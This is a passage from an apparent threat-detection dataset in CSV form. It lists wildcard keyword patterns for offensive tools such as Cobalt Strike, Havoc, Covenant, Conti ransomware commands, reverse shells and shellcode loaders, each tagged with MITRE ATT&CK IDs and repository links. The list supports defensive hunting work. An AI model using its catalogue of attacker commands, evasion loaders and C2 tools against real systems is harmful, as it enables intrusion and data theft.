Gathering,https://github.com/ShawnDEvans/smbmap,1,1,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*shell 'cmd.exe /c*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*shell net group *Domain Computers* /domain*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*shell net localgroup administrators*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*shell nltest /dclist*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*shell rclone.exe copy *,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*shell should now be running as nt authority\\system!*,offensive_tool_keyword,echoac-poc,poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/kite03/echoac-poc,1,0,N/A,8,2,118,25,2023-08-03T04:09:38Z,2023-06-28T00:52:22Z -*shell whoami /user*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,0,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*shell whoami*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*shell.exe -s payload.txt*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,0,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z -*shell_shocked*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*shell_shocked*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*shell_startup_files_modification.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*Shell3er.ps1*,offensive_tool_keyword,Shell3er,PowerShell Reverse Shell,T1059.001 - T1021.004 - T1090.002,TA0002 - TA0011,N/A,N/A,shell spawning,https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1,1,1,N/A,N/A,1,56,11,2023-05-07T16:02:41Z,2023-05-07T15:35:16Z -*shellc *.bin *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*shellc *.shellc *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*ShellCmd cmd.exe *,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*ShellCmd copy *,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*ShellCmd net *,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*ShellCmd sc qc *,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*SHELLCODE GENERATOR*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*shellcode inject *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Shellcode Injected Successfully*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*shellcode spawn *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*shellcode*shellcode.bin*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*shellcode.asm*,offensive_tool_keyword,POC,CVE-2022-21882 win32k LPE bypass CVE-2021-1732,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/KaLendsi/CVE-2022-21882,1,0,N/A,N/A,5,454,142,2022-01-27T04:18:18Z,2022-01-27T03:44:10Z -*Shellcode.x64.bin*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*shellcode_dll.dll*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,1,N/A,N/A,,N/A,,, -*shellcode_dll\*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,0,N/A,N/A,,N/A,,, -*shellcode_dotnet2js*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*shellcode_dropper.c*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,1,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*shellcode_dynwrapx*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Shellcode_encryption.exe*,offensive_tool_keyword,cobaltstrike,ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Axx8/ShellCode_Loader,1,1,N/A,10,10,389,49,2022-09-20T07:24:25Z,2022-09-02T14:41:18Z -*shellcode_exec.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*shellcode_generator.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*shellcode_generator_help.html*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*shellcode_inject.csproj*,offensive_tool_keyword,PowerLessShell,PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.,T1218.010 - T1059 - T1105 - T1047 - T1055,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Mr-Un1k0d3r/PowerLessShell,1,1,N/A,N/A,10,1393,253,2023-03-23T13:30:14Z,2017-05-29T23:03:52Z -*shellcode_inject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ShellCode_Loader.py*,offensive_tool_keyword,cobaltstrike,ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Axx8/ShellCode_Loader,1,1,N/A,10,10,389,49,2022-09-20T07:24:25Z,2022-09-02T14:41:18Z -*shellcode1 += b*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*shellcode20.exe*,offensive_tool_keyword,cobaltstrike,python ShellCode Loader (Cobaltstrike&Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OneHone/C--Shellcode,1,1,N/A,10,10,21,2,2019-11-28T01:53:55Z,2019-11-05T09:48:14Z -*shellcode30.exe*,offensive_tool_keyword,cobaltstrike,python ShellCode Loader (Cobaltstrike&Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OneHone/C--Shellcode,1,1,N/A,10,10,21,2,2019-11-28T01:53:55Z,2019-11-05T09:48:14Z -*shellcode35.exe*,offensive_tool_keyword,cobaltstrike,python ShellCode Loader (Cobaltstrike&Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OneHone/C--Shellcode,1,1,N/A,10,10,21,2,2019-11-28T01:53:55Z,2019-11-05T09:48:14Z -*shellcode40.exe*,offensive_tool_keyword,cobaltstrike,python ShellCode Loader (Cobaltstrike&Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OneHone/C--Shellcode,1,1,N/A,10,10,21,2,2019-11-28T01:53:55Z,2019-11-05T09:48:14Z -*Shellcode-Download_CreateThread_Execution*,offensive_tool_keyword,Shellcode-Downloader-CreateThread-Execution,This POC gives you the possibility to compile a .exe to completely avoid 